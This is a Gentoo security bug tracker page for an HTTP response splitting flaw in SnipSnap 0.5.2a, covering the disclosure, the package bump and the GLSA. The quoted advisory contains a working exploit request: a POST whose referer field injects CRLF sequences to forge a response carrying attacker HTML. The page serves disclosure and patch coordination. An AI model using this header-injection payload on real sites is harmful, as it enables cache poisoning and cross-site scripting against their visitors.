Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 64154 - dev-java/snipsnap-bin: http response splitting
Summary: dev-java/snipsnap-bin: http response splitting
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High minor (vote)
Assignee: Gentoo Security
URL: http://www.securityfocus.com/archive/...
Whiteboard: B3 [glsa] lewk
Keywords:
Depends on:
Blocks:
 
Reported: 2004-09-15 10:30 UTC by Luke Macken (RETIRED)
Modified: 2011-10-30 22:38 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Luke Macken (RETIRED) gentoo-dev 2004-09-15 10:30:50 UTC 
ADVISORY
 
Author: Maestro (me!)

Date: 14-SEP-04
 
Vendor: SnipSnap (www.snipsnap.org)
 
Product: SnipSnap 0.5.2a

Product description (from vendor website):
SnipSnap is a free and easy to install weblog and wiki tool written in Java.

Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - 

http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
 
Exploit:

POST /exec/authenticate HTTP/1.0
Host: cringe.dnsalias.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197

referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%
0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%
0a%0d%0a{html}0wned!!{/html}&cancel=cancel


(replace curly braces with lessthan and greaterthan)

Vendor status: vendor fixed in version 1.0B1. From vendor website:
Tuesday, 14. September 2004
SnipSnap 1.0b1 (uttoxeter) released 
SnipSnap version 1.0b1 has just been released. This release was necessary due to the demand to get updates from 0.5.2a and a security issue know as HTTP response splitting found by someone called Maestro De-Seguridad.
--
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2004-09-15 11:54:11 UTC 
Java herd, please bump to release 1.0B1.
Comment 2 Thomas Matthijs (RETIRED) gentoo-dev 2004-09-15 16:00:48 UTC 
bumped
Comment 3 Luke Macken (RETIRED) gentoo-dev 2004-09-15 16:19:35 UTC 
arches, please mark stable.
Comment 4 Thomas Matthijs (RETIRED) gentoo-dev 2004-09-16 00:36:13 UTC 
stabled
Comment 5 Jochen Maes (RETIRED) gentoo-dev 2004-09-16 01:12:37 UTC 
stable on ppc, x86
java and ppc removed from cc.
Comment 6 Thierry Carrez (RETIRED) gentoo-dev 2004-09-16 01:26:56 UTC 
Ready for a GLSA decision
Comment 7 Thierry Carrez (RETIRED) gentoo-dev 2004-09-16 05:46:48 UTC 
Yes, a GLSA is needed. lewk, the draft is yours.
Comment 8 Kurt Lieber (RETIRED) gentoo-dev 2004-09-17 05:52:40 UTC 
glsa 200409-23